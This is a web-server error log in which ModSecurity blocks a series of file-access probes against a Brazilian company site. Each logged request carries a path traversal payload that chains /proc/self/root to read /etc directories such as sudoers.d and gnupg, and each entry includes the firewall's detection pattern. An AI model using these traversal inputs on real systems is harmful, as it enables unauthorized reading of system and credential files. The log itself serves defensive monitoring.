[Tue Mar 17 08:57:17.599160 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:60916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBne82sZHvlq4xgHq-xwAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:18.236090 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.243.203:34934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBngQohV2v-7oj5HH2iAAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:18.983084 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:58996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBnqBJNF7axNlVR0X4eQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:19.607982 2026] [:error] [pid 2305:tid 140411590858496] [client 74.7.243.203:34940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBnwQohV2v-7oj5HH2iQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:20.910175 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.203:38652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBoAeiSKl8TjouI-b9iwAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:22.187117 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:38660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBogeiSKl8TjouI-b9jgAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:23.379501 2026] [:error] [pid 1961:tid 140411557287680] [client 74.7.243.203:38676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBo3RXaaWotPICgYsgXQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:23.463511 2026] [:error] [pid 7000:tid 140411607643904] [client 74.7.241.46:59008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBoxePVOt35XCGZP8rgwAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:24.787089 2026] [:error] [pid 11469:tid 140411666392832] [client 74.7.243.203:38682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBpJDEJR9VXonE_-1JbgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:24.879059 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:59020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBpJDEJR9VXonE_-1JbwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:26.147824 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.243.203:38690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBpu82sZHvlq4xgHq-0gAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:27.442806 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:38700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBp-82sZHvlq4xgHq-1AAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:29.271269 2026] [:error] [pid 1210:tid 140411725141760] [client 74.7.241.46:59024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBqVKJy4A1bGlmj9BQpAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:30.539434 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:53278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBqpqmL8PQht4WJFlClwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:31.103092 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.243.203:38706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBq5DEJR9VXonE_-1JcgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:32.426708 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.243.203:55414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBrNCmCSWTlPouqorG4gAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:33.702578 2026] [:error] [pid 1016:tid 140411616036608] [client 74.7.243.203:55420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBrZqmL8PQht4WJFlCmAAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:34.986539 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:55434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBrqBJNF7axNlVR0X4gAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:35.033193 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.46:53280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBr6BJNF7axNlVR0X4gQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:57:36.299627 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:55438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBsO82sZHvlq4xgHq-3QAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:57:37.567017 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.243.203:55454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablBsZDEJR9VXonE_-1JdQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
